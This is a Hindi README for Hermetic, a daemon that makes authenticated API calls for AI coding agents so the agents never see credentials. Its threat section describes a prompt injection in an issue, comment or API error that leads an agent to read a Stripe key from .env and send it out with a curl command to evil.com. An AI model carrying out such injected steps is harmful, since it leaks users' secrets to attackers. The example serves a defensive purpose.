
एजेंट-पृथक क्रेडेंशियल ब्रोकर AI एजेंटों के लिए
एजेंट-पृथक क्रेडेंशियल ब्रोकर।
आपका AI एजेंट प्रमाणित कॉल करता है। यह कभी भी कुंजी नहीं देखता।
वेबसाइट · स्थापित करें · त्वरित प्रारंभ · यह कैसे काम करता है · सुरक्षा मॉडल · भेद्यता की रिपोर्ट करें
[!IMPORTANT] आपका AI एजेंट ★★★ ब्रोकर्ड टियर पर काम करता है: क्रेडेंशियल का सादा पाठ एजेंट के संदर्भ में कभी नहीं होता। हर्मेटिक एक अलग डेमॉन के अंदर प्रमाणित कॉल करता है और केवल प्रतिक्रिया लौटाता है। एजेंट को डेटा मिलता है — कुंजी कभी नहीं।
हर AI कोडिंग एजेंट — Claude Code, Cursor, Copilot, Windsurf — आपके उपयोगकर्ता के रूप में शेल कमांड निष्पादित करता है। आपके .env में हर API कुंजी, आपके शेल इतिहास में हर टोकन, ~/.aws/credentials में हर क्रेडेंशियल एजेंट द्वारा चलाए गए किसी भी कोड की पहुंच में है।
GitHub मुद्दे, कोड टिप्पणी या API त्रुटि प्रतिक्रिया में एक प्रॉम्प्ट इंजेक्शन एजेंट को बता सकता है:
1. अपनी Stripe कुंजी खोजें → cat .env | grep STRIPE
2. इसे बाहर निकालें → curl https://evil.com?key=$STRIPE_KEY
3. आपको कभी पता नहीं चलेगा → एजेंट सामान्य रूप से जारी रहता है
यह सैद्धांतिक नहीं है। आपूर्ति-श्रृंखला हमले पहले से ही डेवलपर के UID के तहत क्रेडेंशियल चोरी चला रहे हैं। AI एजेंट इसे डिफ़ॉल्ट आक्रमण सतह बनाते हैं।
हर्मेटिक एक स्थानीय डेमॉन है जो AI एजेंटों की ओर से API कॉल करता है ताकि एजेंट कभी भी आपके क्रेडेंशियल को न छुए।
┌───────────┐ हैंडल ┌──────────────┐ HTTPS ┌──────────┐
│ AI Agent │────────────▶│ Hermetic │─────────────▶│ API │
│ │◀────────────│ Daemon │◀─────────────│ Server │
└───────────┘ प्रतिक्रिया └──────────────┘ प्रतिक्रिया └──────────┘
एजेंट मेमोरी डेमॉन मेमोरी
✗ कोई क्रेडेंशियल नहीं ✓ क्रेडेंशियल (प्रक्रिया में डिक्रिप्टेड)
✓ अपारदर्शी हैंडल ✓ डोमेन बाइंडिंग
✓ API प्रतिक्रिया ✓ छेड़छाड़-स्पष्ट ऑडिट लॉग
क्रेडेंशियल एजेंट के पता स्थान में कभी प्रवेश नहीं करता — मेमोरी, env वेरिएबल्स, फ़ाइलों या कमांड आउटपुट में नहीं। एजेंट को API प्रतिक्रिया मिलती है और कुछ नहीं।
curl -sSf https://hermeticsys.com/install.sh | sh
एक एकल स्थिर बाइनरी (Rust, कोई रनटाइम निर्भरता नहीं)। कोई Docker नहीं, कोई क्लाउड खाता नहीं, कोई टेलीमेट्री नहीं।
दो ओपन-कोर क्रेट्स इस रेपो से बनते हैं:
git clone https://github.com/hermetic-sys/hermetic.git
cd hermetic && cargo build --release --locked
--locked पुनः-समाधान करने के बजाय ऑडिटेड Cargo.lock से बनाता है, नए (संभावित रूप से जहरीले) निर्भरता संस्करणों से नहीं — एक आपूर्ति-श्रृंखला सख्तीकरण कदम जिसे हम किसी भी क्रेडेंशियल टूल के लिए अनुशंसित करते हैं।
Linux x86_64 (V1 यूनिक्स डोमेन सॉकेट्स, SO_PEERCRED, और /proc पर निर्भर करता है — अभी तक macOS/Windows नहीं)
मेमोरी-लॉक अनुमति — हर्मेटिक रहस्यों को RAM में लॉक करता है ताकि वे कभी डिस्क पर स्वैप न हों:
ulimit -l # यदि यह 64 दिखाता है ("unlimited" नहीं):
echo "* - memlock unlimited" | sudo tee -a /etc/security/limits.conf
# लॉग आउट/इन करें, या: ulimit -l unlimited
इसके बिना, hermetic start "mlockall failed." के साथ विफल होता है। एक-बार सेटअप।
[!TIP] भरोसा करने से पहले डाउनलोड को सत्यापित करें — आर्टिफैक्ट्स सत्यापित करें देखें।
hermetic init # एन्क्रिप्टेड वॉल्ट बनाएं (आप एक पासफ़्रेज़ चुनते हैं)
hermetic add # इंटरैक्टिव विज़ार्ड: एक कुंजी पेस्ट करें, स्वचालित रूप से सेवा का पता लगाएं
hermetic start # हार्डनड डेमॉन शुरू करें
hermetic connect # अपने AI एजेंट को वायर करें (auto-detects Claude Code / Cursor / …)
# एक प्रमाणित कॉल करें — कुंजी डेमॉन को कभी नहीं छोड़ती
hermetic request --secret openai_key --url https://api.openai.com/v1/models
hermetic doctor # पुष्टि करें कि सब कुछ स्वस्थ है
hermetic audit # हर्मेटिक द्वारा किया गया हर ऑपरेशन देखें
एक नई मशीन पर आप बिना तर्कों के बस hermetic भी चला सकते हैं — यह पता लगाता है कि अभी तक कोई वॉल्ट नहीं है और मार्गदर्शित सेटअप के माध्यम से चलने की पेशकश करता है।
अधिकांश क्रेडेंशियल मैनेजर आपको एक विकल्प देते हैं: रहस्य पढ़ें, फिर इसे स्वयं उपयोग करें। हर्मेटिक आपको तीन देता है, प्रत्येक अलग गारंटी के साथ।
hermetic request --secret openai_key \
--url https://api.openai.com/v1/chat/completions \
--method POST --body '{"model":"gpt-4","messages":[...]}'
डेमॉन क्रेडेंशियल इंजेक्ट करता है और HTTPS कॉल करता है। एजेंट एक अपारदर्शी हैंडल भेजता है और प्रतिक्रिया प्राप्त करता है — क्रेडेंशियल एक्सपोज़र: शून्य। कोई अन्य क्रेडेंशियल मैनेजर ऐसा नहीं करता: op/Vault/aws-vault सभी रहस्य को कॉल करने वाली प्रक्रिया में लौटाते हैं। हर्मेटिक इसे एक अलग डेमॉन के अंदर रखता है।
hermetic run --secret github_pat --env-var GITHUB_TOKEN -- git push origin main
क्रेडेंशियल एक स्पॉन किए गए चाइल्ड के वातावरण में उस एक कमांड के जीवनकाल के लिए इंजेक्ट किया जाता है, फिर मिटा दिया जाता है। एजेंट को एक्ज़िट कोड मिलता है। चाइल्ड stdout/stderr स्कैन किया जाता है और कोई भी लीक किया गया क्रेडेंशियल संपादित किया जाता है; खतरनाक इंटरप्रेटर अवरुद्ध हैं।
hermetic reveal --secret stripe_key
क्रेडेंशियल को आपके टर्मिनल पर प्रिंट करता है। पासफ़्रेज़-गेटेड, दर-सीमित, ऑडिट-लॉग्ड — जब आपको वास्तव में मैन्युअल रूप से एक कुंजी पेस्ट करने की आवश्यकता हो। केवल CLI; एजेंट टूल के रूप में कभी उजागर नहीं किया गया।
हर MCP सर्वर (GitHub, Slack, Jira, Notion) को सामान्यतः आपके IDE कॉन्फ़िग में अपने टोकन की सादा टेक्स्ट में आवश्यकता होती है। हर्मेटिक MCP सर्वर को प्रॉक्सी करता है और वॉल्ट से क्रेडेंशियल इंजेक्ट करता है:
{
"mcpServers": {
"github": {
"command": "hermetic",
"args": [
"proxy", "--server", "github",
"--credential", "github_pat:GITHUB_PERSONAL_ACCESS_TOKEN",
"--",
"npx", "-y", "@modelcontextprotocol/server-github"
]
}
}
}
--credential <vault-name>:<ENV_VAR> वॉल्ट से रहस्य हल करता है और इसे चाइल्ड के वातावरण में इंजेक्ट करता है — कॉन्फ़िग फ़ाइल में कोई सादा पाठ टोकन नहीं। प्रॉक्सी प्रत्येक सर्वर→एजेंट संदेश को क्रेडेंशियल लीकेज के लिए स्कैन भी करता है, टूल परिभाषाओं को पिन करता है (आपूर्ति-श्रृंखला "रग-पुल" का पता लगाता है), प्रति-टूल अनुमति/अस्वीकार नीति लागू करता है, और चाइल्ड को अपने स्वयं के प्रोसेस ग्रुप में अलग करता है।
हर्मेटिक मानक SSH-एजेंट प्रोटोकॉल बोलता है। SSH_AUTH_SOCK को इस पर इंगित करें और हर git push, scp, rsync, और SSH कनेक्शन एन्क्रिप्टेड वॉल्ट से एक कुंजी के साथ हस्ताक्षर करता है — इसे ~/.ssh/ में निकाले बिना।
hermetic start --ssh-agent
source ~/.hermetic/ssh-agent.env # .bashrc/.zshrc में जोड़ें
hermetic ssh-keygen --type ed25519 --name github-ssh # वॉल्ट के अंदर उत्पन्न
ssh-add -l # आपकी कुंजी दिखाई देती है
git push origin main # डेमॉन के माध्यम से हस्ताक्षर करता है
डेमॉन आंतरिक रूप से सभी हस्ताक्षर करता है — निजी कुंजी बाइट्स कभी भी SSH क्लाइंट में प्रवेश नहीं करते। Ed25519, RSA (SHA-256/512), और ECDSA P-256 समर्थित; SHA-1 हस्ताक्षर अस्वीकृत।
hermetic connect # auto-detects your agent and writes the MCP config
hermetic connect claude-code # या एक को लक्षित करें: claude-code · cursor · windsurf · claude-desktop
hermetic connect --list # समर्थित एजेंटों की सूची
यह हर्मेटिक को एक MCP सर्वर के रूप में पंजीकृत करता है। फिर आपके एजेंट को ये टूल मिलते हैं — और कोई भी टूल कभी भी क्रेडेंशियल मान वापस नहीं करता:
OpenClaw को एक साथ दोनों मोड मिलते हैं: MCP सर्वर (★★★ ब्रोकर्ड, एजेंट के लिए) और एक exec प्रदाता (OpenClaw के अपने LLM कुंजी के लिए)।
hermetic reveal --set anthropic_key # उस एक रहस्य को टैग करें जिसे OpenClaw पढ़ सकता है
hermetic reveal --configure openclaw --install # MCP + exec-प्रदाता कॉन्फ़िग लिखें
exec-प्रदाता का रिज़ॉल्वर hermetic reveal --protocol openclaw है — एक देशी प्रोटोकॉल जो stdin पर एक JSON अनुरोध पढ़ता है ({"ids":[...]}) और stdout पर एक JSON प्रतिक्रिया लिखता है ({"protocolVersion":1,"values":{...}}), और कुछ नहीं। हर रिवील पासफ़्रेज़-गेटेड, दर-सीमित और ऑडिट-लॉग्ड है। एजेंट का ब्रोकर्ड पथ अभी भी hermetic_authenticated_request का उपयोग करता है और कभी मूल्य नहीं देखता। पूर्ण प्रवाह: OpenClaw सेटअप।
हर्मेटिक आपके सबसे संवेदनशील क्रेडेंशियल रखता है, इसलिए यह उसी एजेंट के खिलाफ कठोर है जो उनका उपयोग करने की कोशिश कर रहा है।
डेमॉन स्वयं की रक्षा करता है प्रत्येक कनेक्शन पर तीन परतों के साथ:
1. बाइनरी प्रमाणन — डेमॉन कनेक्ट करने वाली बाइनरी के हैश की पुष्टि करता है।
एक Python स्क्रिप्ट या अज्ञात बाइनरी को अस्वीकार किया जाता है।
2. प्रति-संदेश प्रेषक — कर्नेल प्रत्येक संदेश पर प्रेषक पहचान सत्यापित करता है।
सत्र के बीच में एक अलग प्रक्रिया को अस्वीकार किया जाता है।
3. प्रक्रिया-बद्ध टोकन — किसी अन्य प्रक्रिया द्वारा चुराया गया सत्र टोकन अस्वीकार किया जाता है।
इसके अलावा: रहस्य RAM में मेमोरी-लॉक किए गए, कोर डंप अक्षम, डंप सुरक्षा, SSRF ब्लॉकिंग और DNS पिनिंग के साथ केवल HTTPS, और एक छेड़छाड़-स्पष्ट HMAC-श्रृंखलित ऑडिट लॉग (hermetic audit)।
[!WARNING] हर्मेटिक किसके खिलाफ रक्षा नहीं करता। ब्रोकरिंग क्रेडेंशियल को एजेंट से अलग करता है — उस समान-UID प्रक्रिया से नहीं जो हर्मेटिक के रूप में ही कोड निष्पादित कर सकती है। कर्नेल समान-UID कोड के बीच अंतर नहीं कर सकता (
SO_PEERCREDकेवल UID सत्यापित करता है), इसलिए क्रेडेंशियल उपयोग स्वीकार किया जाता है: एक प्रक्रिया जो पहले से ही आपके रूप में चल रही है, ब्रोकर्ड कॉल चला सकती है और प्रतिक्रियाएँ पढ़ सकती है। जो उस प्रक्रिया के खिलाफ भी बंद रहता है: क्रेडेंशियल सादा पाठ उसके लिए कभी उजागर नहीं होता (कोई रिवील पथ नहीं है), और वॉल्ट उत्परिवर्तन (जोड़ें/रोटेट/रीबाइंड) के लिए ताजा उपयोगकर्ता-उपस्थिति प्रमाण की आवश्यकता होती है — इसलिए यह कुंजी चुरा या चुपचाप वॉल्ट को बदल नहीं सकता। बाइनरी प्रमाणन अतिरिक्त रूप से किसी गैर-हर्मेटिक बाइनरी को बिल्कुल भी कनेक्ट होने से रोकता है। यह सादा पाठ env फ़ाइलों या कीचेन से काफी मजबूत है, जो किसी भी समान-UID प्रक्रिया को कच्ची कुंजी सीधे देते हैं। हर्मेटिक अभी भी पूरी तरह से समझौता किए गए स्थानीय उपयोगकर्ता खाते, कर्नेल-स्तरीय हमलावरों, या हार्डवेयर मेमोरी फोरेंसिक के खिलाफ कोई सुरक्षा नहीं है। हम इस सीमा को प्रमुखता से दस्तावेज़ित करते हैं क्योंकि इसके बारे में ईमानदारी उत्पाद का हिस्सा है।
पूर्ण थ्रेट मॉडल, समर्थित संस्करण और भेद्यता की रिपोर्ट कैसे करें, इसके लिए SECURITY.md देखें।
प्रत्येक रिलीज़ में SHA256SUMS होता है। डाउनलोड करने के बाद, चलाने से पहले चेकसम सत्यापित करें:
sha256sum -c SHA256SUMS
GPG रिलीज़ हस्ताक्षर (एक प्रकाशित कुंजी फिंगरप्रिंट के खिलाफ एक अलग SHA256SUMS.asc) योजनाबद्ध है; तब तक, SHA-256 चेकसम अखंडता जांच है। क्रेडेंशियल टूल के लिए, आपके द्वारा चलाए जाने वाले बाइनरी को सत्यापित करना आधार रेखा है — install.sh यह आपके लिए स्वचालित रूप से करता है।
हर्मेटिक ओपन कोर है — हम इस बारे में स्पष्ट हैं कि क्या ओपन सोर्स है और क्या नहीं।
इस रिपॉजिटरी में दो क्रेट्स AGPL-3.0-or-later हैं और आप उन्हें स्वयं ऑडिट और बना सकते हैं। ब्रोकर डेमॉन/CLI बाइनरी मालिकाना है (मुफ्त टियर + भुगतान किए गए Pro सुविधाएँ) — यह ओपन सोर्स नहीं है, और हम जानबूझकर ऐसा कहते हैं। सुरक्षा कभी भी गेटेड नहीं है: मुफ्त और Pro बाइनरी समान सुरक्षा कोड चलाते हैं।
आप "एक रहस्य संग्रहीत करें, इसे वापस दें" को कुछ सौ पंक्तियों में बना सकते हैं। लेकिन फिर आपकी मशीन पर कोई भी स्क्रिप्ट सॉकेट से कनेक्ट हो सकती है और आपकी कुंजियाँ ले सकती है — ठीक वही समस्या जब AI एजेंट आपके UID के रूप में मनमाना कोड चलाते हैं। जटिलता एन्क्रिप्शन नहीं है; यह सुनिश्चित करना है कि गलत प्रक्रिया उस तक न पहुँच सके जो एन्क्रिप्टेड है: बाइनरी प्रमाणन, प्रति-संदेश प्रेषक सत्यापन, प्रक्रिया-बद्ध टोकन, क्रेडेंशियल-लीक स्कैनिंग, टूल-परिभाषा पिनिंग, SSRF ब्लॉकिंग, DNS पिनिंग, इंटरप्रेटर ब्लॉकलिस्ट, और मेमोरी हार्डनिंग। प्रत्येक रक्षा मौजूद है क्योंकि इसके बिना एक वास्तविक हमला प्रदर्शित किया गया था।
हर्मेटिक को प्रतिकूल रूप से मान्य किया गया है — स्वतंत्र AI-संचालित रेड-टीम अभियान, शून्य क्रैश के साथ फ़ज़िंग, उत्परिवर्तन परीक्षण, और चल रहे डेमॉन के खिलाफ लाइव हमला सिमुलेशन। परीक्षण के दौरान पाए गए वास्तविक भेद्यताओं को पुन: प्रस्तुत किया गया और कर्नेल-स्तरीय सुरक्षा के साथ स्थायी रूप से बंद कर दिया गया। क्रिप्टोग्राफिक कोर (यह रिपॉजिटरी) स्वतंत्र समीक्षा के लिए खुला है। पूरी कहानी श्वेतपत्र में है।
CONTRIBUTING.md देखें। ओपन-कोर क्रेट्स में योगदान के लिए हस्ताक्षरित CLA आवश्यक है।
ओपन-कोर क्रेट्स (hermetic-core, hermetic-transport): AGPL-3.0-or-later (LICENSE)।
हर्मेटिक बाइनरी मालिकाना है — COMMERCIAL_LICENSE.md देखें या [email protected] से संपर्क करें।
.env / env वेरिएबल्स | 1Password / Vault / aws-vault | हर्मेटिक |
|---|
| रहस्य कॉलिंग प्रक्रिया तक पहुँचता है | ✅ हमेशा | ✅ कॉलर को लौटाया गया | ❌ कभी नहीं (ब्रोकर्ड) |
| एजेंट को कुंजी देखे बिना काम करता है | ❌ | ❌ | ✅ |
| प्रति-क्रेडेंशियल डोमेन बाइंडिंग | ❌ | ❌ | ✅ |
| हमलावर डोमेन में एक्सफ़िल्ट्रेशन को रोकता है | ❌ | ❌ | ✅ |
| छेड़छाड़-स्पष्ट ऑडिट लॉग | ❌ | आंशिक | ✅ |
| समान-UID सॉकेट एक्सेस नियंत्रण | n/a | ❌ | ✅ बाइनरी प्रमाणन |
| आराम पर एन्क्रिप्टेड | ❌ | ✅ | ✅ AES-256-GCM |
| टूल | एजेंट क्या कर सकता है | इसे क्या वापस मिलता है |
|---|
hermetic_authenticated_request | एक संग्रहीत क्रेडेंशियल के साथ API कॉल करें | केवल HTTP प्रतिक्रिया |
hermetic_list_secrets | देखें कि कौन से क्रेडेंशियल मौजूद हैं | नाम + मेटाडेटा, कभी मान नहीं |
hermetic_env_spawn | env में क्रेडेंशियल के साथ एक कमांड चलाएं | केवल एक्ज़िट कोड |
hermetic_suggest_add | क्रेडेंशियल जोड़ने के लिए CLI कमांड प्राप्त करें | सेटअप निर्देश |
hermetic_seal_vault | आपातकालीन लॉकडाउन | पुष्टिकरण |
hermetic_sign_jwt (Pro) | एक JWT पर हस्ताक्षर करें → एक एक्सेस टोकन के लिए आदान-प्रदान करें | केवल एक्सेस टोकन, कभी कुंजी नहीं |
| यहाँ प्रकाशित (AGPL-3.0) | हर्मेटिक बाइनरी (मुफ्त) | Pro |
|---|
hermetic-core — वॉल्ट, KDF, कुंजी पदानुक्रम, ऑडिट श्रृंखला | ✅ स्रोत | ✅ | ✅ |
hermetic-transport — HTTPS निष्पादक, SSRF रक्षा, DNS पिनिंग | ✅ स्रोत | ✅ | ✅ |
| डेमॉन, MCP ब्रिज, प्रॉक्सी, CLI, SSH एजेंट | — | ✅ | ✅ |
| ★★★ ब्रोकर्ड अनुरोध · डोमेन बाइंडिंग · ऑडिट लॉग | — | ✅ | ✅ |
| 10 रहस्य · 1 वातावरण | — | ✅ | असीमित |
| OAuth2 ऑटो-रिफ्रेश · AWS SigV4 · JWT हस्ताक्षर | — | — | ✅ |
| TUI + वेब डैशबोर्ड · उपयोग विश्लेषण | — | — | ✅ |